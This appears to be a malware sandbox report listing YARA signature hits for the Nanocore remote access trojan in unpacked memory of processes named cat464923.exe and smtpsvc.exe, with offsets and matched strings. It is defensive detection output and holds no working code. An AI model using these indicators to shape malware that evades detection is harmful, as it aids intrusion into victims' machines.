5.2.cat464923.exe.34db366.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d59d:$a: NanoCore 0x2d5b2:$a: NanoCore 0x2d5e7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d359:$b: ClientPlugin 0x2d374:$b: ClientPlugin
16.2.cat464923.exe.32d019c.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287b1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287de:$x2: IClientNetworkHost
16.2.cat464923.exe.32d019c.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287b1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2988c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287cb:$s5: IClientLoggingHost
16.2.cat464923.exe.32d019c.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.cat464923.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.2.cat464923.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.2.cat464923.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.cat464923.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.cat464923.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.cat464923.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.2.cat464923.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.cat464923.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
17.2.smtpsvc.exe.334b366.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x145e3:$x1: NanoCore.ClientPluginHost 0x2d5e7:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x14610:$x2: IClientNetworkHost 0x2d614:$x2: IClientNetworkHost
17.2.smtpsvc.exe.334b366.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x145e3:$x2: NanoCore.ClientPluginHost 0x2d5e7:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0x156be:$s4: PipeCreated 0x2e6c2:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost 0x145fd:$s5: IClientLoggingHost 0x2d601:$s5: IClientLoggingHost
17.2.smtpsvc.exe.334b366.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.smtpsvc.exe.334b366.5.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x14599:$a: NanoCore 0x145ae:$a: NanoCore 0x145e3:$a: NanoCore 0x2d59d:$a: NanoCore 0x2d5b2:$a: NanoCore 0x2d5e7:$a: NanoCore 0xe41:$b: ClientPlugin 0xe7e:$b: ClientPlugin 0x177c:$b: ClientPlugin 0x1789:$b: ClientPlugin 0x14355:$b: ClientPlugin 0x14370:$b: ClientPlugin 0x143a0:$b: ClientPlugin 0x145b7:$b: ClientPlugin 0x145ec:$b: ClientPlugin 0x2d359:$b: ClientPlugin 0x2d374:$b: ClientPlugin
18.2.smtpsvc.exe.33a019c.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287b1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287de:$x2: IClientNetworkHost
18.2.smtpsvc.exe.33a019c.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287b1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2988c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287cb:$s5: IClientLoggingHost
18.2.smtpsvc.exe.33a019c.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.cat464923.exe.440000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.cat464923.exe.440000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
5.0.cat464923.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.0.cat464923.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
5.0.cat464923.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.0.cat464923.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
17.2.smtpsvc.exe.33547c5.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24188:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241b5:$x2: IClientNetworkHost
17.2.smtpsvc.exe.33547c5.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24188:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25263:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241a2:$s5: IClientLoggingHost
17.2.smtpsvc.exe.33547c5.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.cat464923.exe.34e47c5.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0x24188:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost 0x241b5:$x2: IClientNetworkHost
5.2.cat464923.exe.34e47c5.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0x24188:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0x25263:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost 0x241a2:$s5: IClientLoggingHost
5.2.cat464923.exe.34e47c5.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.cat464923.exe.400000.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.cat464923.exe.400000.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.0.cat464923.exe.400000.3.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.cat464923.exe.400000.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.0.cat464923.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
16.0.cat464923.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
16.0.cat464923.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.cat464923.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.smtpsvc.exe.3174d80.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
12.2.smtpsvc.exe.3174d80.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
12.2.smtpsvc.exe.3174d80.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.smtpsvc.exe.3174d80.5.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
17.2.smtpsvc.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.smtpsvc.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
17.2.smtpsvc.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.smtpsvc.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
16.2.cat464923.exe.22a4dc8.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
16.2.cat464923.exe.22a4dc8.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
13.2.smtpsvc.exe.3444d80.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
13.2.smtpsvc.exe.3444d80.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
13.2.smtpsvc.exe.3444d80.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
17.2.smtpsvc.exe.335019c.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
17.2.smtpsvc.exe.335019c.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
17.2.smtpsvc.exe.335019c.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.cat464923.exe.32d019c.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
16.2.cat464923.exe.32d019c.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
16.2.cat464923.exe.32d019c.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.cat464923.exe.24aeb3c.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.cat464923.exe.24aeb3c.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
4.2.cat464923.exe.34a4d80.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
4.2.cat464923.exe.34a4d80.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
4.2.cat464923.exe.34a4d80.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
4.2.cat464923.exe.34a4d80.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.cat464923.exe.4a4629.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
5.2.cat464923.exe.4a4629.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
5.2.cat464923.exe.4a4629.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.smtpsvc.exe.335019c.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287b1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287de:$x2: IClientNetworkHost
17.2.smtpsvc.exe.335019c.6.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287b1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2988c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287cb:$s5: IClientLoggingHost
17.2.smtpsvc.exe.335019c.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.0.smtpsvc.exe.400000.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
18.0.smtpsvc.exe.400000.2.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
18.0.smtpsvc.exe.400000.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.0.smtpsvc.exe.400000.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.2.cat464923.exe.4a0000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
5.2.cat464923.exe.4a0000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
5.2.cat464923.exe.4a0000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.smtpsvc.exe.400000.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
18.2.smtpsvc.exe.400000.1.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
18.2.smtpsvc.exe.400000.1.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
18.2.smtpsvc.exe.400000.1.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
11.2.cat464923.exe.3304d80.6.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
11.2.cat464923.exe.3304d80.6.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
11.2.cat464923.exe.3304d80.6.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
11.2.cat464923.exe.3304d80.6.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
5.2.cat464923.exe.34e019c.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0x287b1:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost 0x287de:$x2: IClientNetworkHost
5.2.cat464923.exe.34e019c.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x287b1:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0x2988c:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost 0x287cb:$s5: IClientLoggingHost
5.2.cat464923.exe.34e019c.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
